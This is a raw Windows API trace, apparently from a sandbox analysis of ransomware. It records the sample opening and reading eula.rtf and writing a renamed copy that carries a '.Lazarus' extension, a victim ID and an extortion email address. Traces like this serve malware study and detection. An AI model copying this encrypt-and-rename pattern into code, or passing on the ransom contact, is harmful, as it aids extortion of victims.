[0069.626] AreFileApisANSI () returned 1 [0069.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78010 [0069.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78010, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045") returned 27 [0069.626] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045" (normalized: "c:\\588bce7c90097ed212\\1045"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.626] GetLastError () returned 0x5 [0069.626] GetLastError () returned 0x5 [0069.626] SetLastError (dwErrCode=0x5) [0069.626] GetLastError () returned 0x5 [0069.626] SetLastError (dwErrCode=0x5) [0069.626] GetLastError () returned 0x5 [0069.626] SetLastError (dwErrCode=0x5) [0069.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78010 | out: hHeap=0x20000) returned 1 [0069.626] AreFileApisANSI () returned 1 [0069.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0069.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78750 [0069.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78750, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045") returned 27 [0069.627] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045" (normalized: "c:\\588bce7c90097ed212\\1045"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.627] GetLastError () returned 0x5 [0069.627] GetLastError () returned 0x5 [0069.627] SetLastError (dwErrCode=0x5) [0069.627] GetLastError () returned 0x5 [0069.627] SetLastError (dwErrCode=0x5) [0069.627] GetLastError () returned 0x5 [0069.627] SetLastError (dwErrCode=0x5) [0069.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78750 | out: hHeap=0x20000) returned 1 [0069.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0069.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0069.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0069.627] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1046", cAlternateFileName="")) returned 1 [0069.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.627] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78390 [0069.628] FindNextFileW (in: hFindFile=0x78390, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.628] FindNextFileW (in: hFindFile=0x78390, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46588 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0069.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0069.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0069.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.629] AreFileApisANSI () returned 1 [0069.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1045\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0069.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0069.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0069.629] AreFileApisANSI () returned 1 [0069.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0069.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0069.629] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.629] GetFileType (hFile=0x410) returned 0x1 [0069.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0069.629] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0069.630] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0069.630] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0069.630] CloseHandle (hObject=0x410) returned 1 [0069.630] AreFileApisANSI () returned 1 [0069.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0069.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0069.630] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.630] GetFileType (hFile=0x410) returned 0x1 [0069.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0069.630] CloseHandle (hObject=0x410) returned 1 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.631] AreFileApisANSI () returned 1 [0069.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0069.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0069.631] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8)) returned 1 [0069.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0069.632] AreFileApisANSI () returned 1 [0069.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.632] GetLastError () returned 0x0 [0069.632] SetLastError (dwErrCode=0x0) [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0069.632] GetLastError () returned 0x0 [0069.632] SetLastError (dwErrCode=0x0) [0069.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0069.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0069.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0069.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.633] AreFileApisANSI () returned 1 [0069.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0069.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0069.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0069.633] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.635] GetFileType (hFile=0x410) returned 0x1 [0069.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0069.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0069.635] AreFileApisANSI () returned 1 [0069.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0069.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0069.635] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.635] GetFileType (hFile=0x428) returned 0x1 [0069.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0069.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0069.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.636] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0xfc8, lpOverlapped=0x0) returned 1 [0069.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0069.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0069.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0069.638] GetLastError () returned 0x0 [0069.638] SetLastError (dwErrCode=0x0) [0069.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0069.639] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0xfd0, lpOverlapped=0x0) returned 1 [0069.639] GetLastError () returned 0x0 [0069.639] SetLastError (dwErrCode=0x0) [0069.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.640] GetLastError () returned 0x0 [0069.640] SetLastError (dwErrCode=0x0) [0069.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0069.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0069.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0069.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 